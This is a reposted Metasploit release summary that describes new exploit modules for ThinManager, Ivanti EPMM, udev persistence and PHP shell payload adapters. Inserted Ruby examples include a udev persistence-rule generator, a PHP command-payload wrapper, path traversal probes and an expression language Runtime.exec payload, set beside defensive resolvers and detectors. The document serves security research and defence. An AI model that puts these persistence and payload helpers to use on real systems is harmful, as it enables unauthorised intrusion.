National Cyber Warfare Foundation (NCWF)

Metasploit Wrap-up 06 06 25


2025-06-06 22:54:11
milo
Red Team (CNA)
This release adds modules targeting ThinManager vulnerabilities (CVE-2023-27855, CVE-2023-2917, CVE-2023-27856), a udev persistence module for Linux, an Ivanti EPMM authentication bypass and remote code execution module (CVE-2025-4427, CVE-2025-4428), PHP payload adapters, and more.

ThinManager Path Traversal (CVE-2023-27855) Arbitrary File Upload



Authors: Michael Heinzl and Tenable

Type: Auxiliary

Pull request: #20138 contributed by h4x-x0r

Path: admin/networking/thinmanager_traversal_upload

AttackerKB reference: CVE-2023-27855


Description: Adds an auxiliary module that targets CVE-2023-27855, a path traversal vulnerability in ThinManager <= v13.0.1 to upload an arbitrary file to the target system as SYSTEM.


ThinManager Path Traversal (CVE-2023-2917) Arbitrary File Upload


Authors: Michael Heinzl and Tenable

Type: Auxiliary

Pull request: #20141 contributed by h4x-x0r

Path: admin/networking/thinmanager_traversal_upload2

AttackerKB reference: CVE-2023-2917


Description: Adds a module targeting CVE-2023-2917, a path traversal vulnerability in ThinManager <= v13.1.0, to upload an arbitrary file as SYSTEM.


ThinManager Path Traversal (CVE-2023-27856) Arbitrary File Download


Authors: Michael Heinzl and Tenable

Type: Auxiliary

Pull request: #20139 contributed by h4x-x0r

Path: gather/thinmanager_traversal_download

AttackerKB reference: CVE-2023-27856


Description: Adds an auxiliary module targeting CVE-2023-27856, a path traversal vulnerability in ThinManager <= v13.0.1, to download an arbitrary file from the target system.
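All three modules abuse the same weakness: a file name supplied by the client is turned into a filesystem path without being confined to the directory the server meant to expose. The Ruby below is an added illustration, not code from ThinManager or from the modules; it places the vulnerable shape beside a hardened resolver. The base directory, the probe names and the helper names are assumptions made for the example.

```ruby
require 'uri'

BASE_DIR = '/srv/thinmanager/files'.freeze # hypothetical served directory

# Vulnerable shape: the client-supplied name is appended verbatim.
# File.join does not normalise "..", so "../../etc/passwd" leaves BASE_DIR.
def unsafe_resolve(base, client_name)
  File.join(base, client_name)
end

# Hardened shape. Returns the canonical absolute path, or nil if the name
# would leave base. Steps: decode percent-encoding, treat backslash as a
# separator (the product runs on Windows), refuse NUL bytes, absolute paths
# and "~" expansion, canonicalise lexically, then require the result to sit
# under base compared with a trailing "/" so "files_old" is not mistaken
# for "files".
def safe_resolve(base, client_name)
  name = URI.decode_www_form_component(client_name.to_s)
  return nil if name.include?("\0")
  name = name.tr('\\', '/')
  return nil if name.start_with?('~', '/')
  base = File.expand_path(base)
  resolved = File.expand_path(name, base)
  return nil unless resolved == base || resolved.start_with?(base + '/')
  resolved
rescue ArgumentError # malformed %-encoding
  nil
end

# Constructed probe names of the kind a traversal module would send.
TRAVERSAL_PROBES = [
  'report.txt',
  'sub/../report.txt',
  '../../etc/passwd',
  '..\\..\\Windows\\win.ini',
  '%2e%2e%2f%2e%2e%2fetc%2fpasswd',
  "a\0b",
].freeze

# Pair each probe with what the hardened resolver makes of it.
def classify(probes = TRAVERSAL_PROBES)
  probes.map { |p| [p, safe_resolve(BASE_DIR, p)] }
end

if $PROGRAM_NAME == __FILE__
  classify.each { |p, r| puts "#{p.inspect} => #{r.inspect}" }
end
```

The unsafe variant never rejects anything; the hardened one returns nil for every probe that would leave BASE_DIR, including the backslash and percent-encoded forms.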


udev persistence


Author: Julien Voisin

Type: Exploit

Pull request: #19472 contributed by jvoisin

Path: linux/local/udev_persistence


Description: This adds a module for udev persistence on Linux targets. The module requires root access because it creates udev rules. It will create a rule under the directory /lib/udev/rules.d/ and a malicious binary containing the payload. Successful exploitation requires the presence of the at binary on the system.
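The rule shape and the audit below are an added example, not the module's code, of the technique as described: a RUN+= entry that hands the payload to at, so the payload outlives the RUN process udev kills after its timeout, plus a scan of the rule directories a defender would check. The match keys, file names and payload path are illustrative.

```ruby
require 'tmpdir'

# Directories udev reads rules from; /etc overrides /lib (or /usr/lib).
UDEV_RULE_DIRS = %w[/etc/udev/rules.d /run/udev/rules.d /usr/lib/udev/rules.d /lib/udev/rules.d].freeze

# Shape of the rule the write-up describes (match keys are illustrative):
# when a matching device event fires, udev runs the RUN+= program. Piping
# the payload path into `at now` hands it to atd, so the payload is not
# killed with udev's short-lived RUN process.
def udev_persistence_rule(payload_path)
  %(ACTION=="add", SUBSYSTEM=="net", KERNEL=="lo", RUN+="/bin/sh -c 'echo #{payload_path} | at now'")
end

# The module's stated prerequisite: an `at` binary somewhere on PATH.
def at_available?(path = ENV.fetch('PATH', ''))
  path.split(File::PATH_SEPARATOR).any? { |d| File.executable?(File.join(d, 'at')) }
end

# Defender side: flag RUN+= entries that delegate to a scheduler or a
# backgrounder, which is how a RUN program escapes udev's timeout.
RUN_DELEGATION = /RUN\+=.*\b(at|batch|nohup|setsid|systemd-run)\b/

def audit_udev_rules(dirs = UDEV_RULE_DIRS)
  dirs.flat_map do |dir|
    Dir.glob(File.join(dir, '*.rules')).sort.flat_map do |file|
      File.foreach(file).with_index(1).filter_map do |line, no|
        next if line.lstrip.start_with?('#')
        m = RUN_DELEGATION.match(line)
        { file: file, line: no, via: m[1], rule: line.strip } if m
      end
    end
  end
end

# Self-contained run: write one hypothetical persistence rule and one benign
# rule into a temporary directory and audit only that directory
# (constructed data, nothing touches the real rule directories).
def demo_audit
  Dir.mktmpdir('udev-audit') do |dir|
    File.write(File.join(dir, '99-zz.rules'),
               udev_persistence_rule('/usr/local/bin/.cache-helper') + "\n")
    File.write(File.join(dir, '70-benign.rules'),
               %(# RUN+="at" inside a comment must not count\nSUBSYSTEM=="usb", MODE="0660", GROUP="plugdev"\n))
    audit_udev_rules([dir])
  end
end

if $PROGRAM_NAME == __FILE__
  puts "at binary present: #{at_available?}"
  demo_audit.each { |h| puts "#{h[:file]}:#{h[:line]} via #{h[:via]}: #{h[:rule]}" }
end
```

Running audit_udev_rules with its default directories on a live host lists every rule that delegates a RUN+= command; on a host that has never been touched, a hit is worth a look, since stock rules rarely need at or nohup.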


Ivanti EPMM Authentication Bypass for Expression Language Remote Code Execution


Authors: CERT-EU, Piotr Bazydlo, Sonny Macdonald, and remmons-r7

Type: Exploit

Pull request: #20265 contributed by remmons-r7

Path: multi/http/ivanti_epmm_rce_cve_2025_4427_4428

AttackerKB reference: CVE-2025-4428


Description: Adds a module chaining CVE-2025-4427, an authentication flaw that allows unauthenticated access to an administrator web API endpoint, with CVE-2025-4428, an expression language injection reachable through that endpoint that allows code execution, on many versions of MobileIron Core (rebranded as Ivanti EPMM).
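Added example, not the module's code: detection logic a responder could run over web access logs for the second half of the chain, an expression language payload arriving in a request parameter. The log lines, the /api/v2/report path and the format parameter are constructed for the example and are not the Ivanti endpoint; the marker list is the generic signature of Java expression language injection.

```ruby
require 'uri'

# Markers of Java expression language being injected through a request
# parameter. Checked after URL-decoding so %24%7B (that is, "${") is caught.
EL_MARKERS = [
  /\$\{/,                   # ${ ... } template expression
  /#\{/,                    # #{ ... } template expression
  /\bT\(\s*java\./,         # SpEL type reference such as T(java.lang.Runtime)
  /getRuntime\(\)\.exec/,   # Runtime.getRuntime().exec(...)
].freeze

# Constructed access-log lines in combined format (not real product logs;
# the path and parameter are made up for the example).
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [06/Jun/2025:10:00:01 +0000] "GET /login HTTP/1.1" 200 512
  10.0.0.5 - - [06/Jun/2025:10:00:02 +0000] "GET /api/v2/report?format=csv HTTP/1.1" 200 2048
  203.0.113.9 - - [06/Jun/2025:10:00:03 +0000] "GET /api/v2/report?format=%24%7BT(java.lang.Runtime).getRuntime().exec('id')%7D HTTP/1.1" 500 98
  203.0.113.9 - - [06/Jun/2025:10:00:04 +0000] "GET /api/v2/report?format=%2524%257B7*7%257D HTTP/1.1" 500 98
LOG

# Pull method, path and raw query out of the quoted request line.
def parse_request(line)
  m = line.match(%r{"(?<method>[A-Z]+) (?<target>\S+) HTTP/[\d.]+"})
  return nil unless m
  path, query = m[:target].split('?', 2)
  [m[:method], path, query || '']
end

# Decode repeatedly (bounded) so double-encoded payloads do not slip past.
def deep_decode(s, rounds = 3)
  rounds.times do
    d = begin
      URI.decode_www_form_component(s)
    rescue ArgumentError # malformed %-sequence: keep what we have
      s
    end
    break if d == s
    s = d
  end
  s
end

# One hash per request whose decoded query carries an EL marker.
def suspicious_requests(lines)
  lines.filter_map do |line|
    req = parse_request(line)
    next unless req
    _method, path, query = req
    decoded = deep_decode(query)
    marker = EL_MARKERS.find { |re| decoded.match?(re) }
    next unless marker
    { path: path, decoded_query: decoded, marker: marker.source }
  end
end

if $PROGRAM_NAME == __FILE__
  suspicious_requests(SAMPLE_LOG.lines).each { |h| puts "#{h[:path]} #{h[:marker]} #{h[:decoded_query]}" }
end
```

The bounded re-decoding matters: the fourth constructed line is double-encoded and only reveals "${7*7}" after two passes, which is the probe an attacker sends to confirm evaluation before sending a Runtime.exec payload.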


PHP Exec, PHP Command Shell, Bind TCP (via Perl)


Authors: Samy, Spencer McIntyre, cazz, and msutovsky-r7

Type: Payload (Adapter)

Pull request: #19976 contributed by msutovsky-r7


Description: This adds an adapter that wraps bash / sh command payloads in PHP code, so that cmd/unix payloads can be delivered wherever the target will execute PHP.


This adapter adds the following payloads:



  • cmd/unix/php/bind_perl

  • cmd/unix/php/bind_perl_ipv6

  • cmd/unix/php/bind_php

  • cmd/unix/php/bind_php_ipv6

  • cmd/unix/php/download_exec

  • cmd/unix/php/exec

  • cmd/unix/php/meterpreter/bind_tcp

  • cmd/unix/php/meterpreter/bind_tcp_ipv6

  • cmd/unix/php/meterpreter/bind_tcp_ipv6_uuid

  • cmd/unix/php/meterpreter/bind_tcp_uuid

  • cmd/unix/php/meterpreter/reverse_tcp

  • cmd/unix/php/meterpreter/reverse_tcp_uuid

  • cmd/unix/php/meterpreter_reverse_tcp

  • cmd/unix/php/reverse_perl

  • cmd/unix/php/reverse_php

  • cmd/unix/php/shell_findsock
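To show what a PHP adapter does, here is an added example, not the adapter's code, of wrapping a shell command payload in a PHP stub while choosing an exec function that php.ini's disable_functions has not blocked. The function names, the candidate list and the sample commands are assumptions made for the example.

```ruby
require 'base64'

# PHP functions that can execute an OS command, in the order to try them.
PHP_EXEC_FUNCS = %w[system passthru shell_exec exec popen].freeze

# Parse a php.ini-style `disable_functions` value into an array of names.
def disabled_functions(ini_value)
  ini_value.to_s.split(',').map(&:strip).reject(&:empty?)
end

# First candidate not on the disabled list, or nil if every one is blocked.
def pick_exec_func(disabled)
  PHP_EXEC_FUNCS.find { |f| !disabled.include?(f) }
end

# Wrap a bash/sh command payload in a PHP stub. The command travels
# base64-encoded so quotes, `$` and newlines in it cannot break out of the
# PHP string literal; exec-style functions get their output echoed so a
# command-shell payload still returns its result.
def wrap_cmd_in_php(cmd, disabled: [])
  func = pick_exec_func(disabled) or raise 'every exec function is disabled'
  decode = "base64_decode('#{Base64.strict_encode64(cmd)}')"
  call = case func
         when 'shell_exec' then "echo shell_exec(#{decode});"
         when 'exec'       then "exec(#{decode}, $o); echo implode(\"\\n\", $o);"
         when 'popen'      then "$p = popen(#{decode}, 'r'); while (!feof($p)) { echo fread($p, 4096); } pclose($p);"
         else                   "#{func}(#{decode});"
         end
  "<?php #{call} ?>"
end

# Recover the wrapped command from a stub of this shape; handy when
# triaging a web shell found on disk.
def unwrap_php(stub)
  b64 = stub[/base64_decode\('([A-Za-z0-9+\/=]+)'\)/, 1] or return nil
  Base64.strict_decode64(b64)
end

if $PROGRAM_NAME == __FILE__
  puts wrap_cmd_in_php("id; uname -a")
  puts wrap_cmd_in_php("id; uname -a", disabled: disabled_functions('system,passthru,shell_exec'))
end
```

When every candidate is disabled the wrapper raises rather than emitting a stub that would silently fail on the target, which is the failure mode a tester otherwise spends time chasing.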


Enhancements and features (3)



  • #19900 from jvoisin - Updates the notes of multiple modules to include additional AKA (Also Known As) references for EquationGroup codenames.

  • #20263 from cdelafuente-r7 - Updates Metasploit to register VulnAttempts for both Exploit and Auxiliary modules.

  • #20277 from adfoster-r7 - Add support for Ruby 3.2.8.


Bugs fixed (7)



  • #20218 from jheysel-r7 - Fixes an issue in the web crawler's canonicalize method, which previously resulted in incorrect URIs being returned.

  • #20246 from bcoles - Fixes an issue within msfvenom when using the zutto_dekiru encoder on a raw payload.

  • #20258 from zeroSteiner - Updates the datastore options in auxiliary/admin/ldap/shadow_credentials to reference the new LDAP datastore names.

  • #20260 from zeroSteiner - Updates the auxiliary/admin/ldap/change_password module to use the new LDAP datastore options.

  • #20273 from JohannesLks - This fixes multiple issues in the post/windows/manage/remove_host module that would occur when a line had multiple names on it or used tab characters instead of spaces.

  • #20275 from msutovsky-r7 - This fixes a bug in the auxiliary/scanner/sap/sap_router_info_request module that would cause it to crash when a corrupted packet was received.

  • #20281 from JohannesLks - This fixes an issue in the post/windows/manage/resolve_host module that would occur if the system wasn't installed to C:\.


Get it


As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:


If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.




Source: Rapid7
Source Link: https://blog.rapid7.com/2025/06/06/metasploit-wrapup-76/

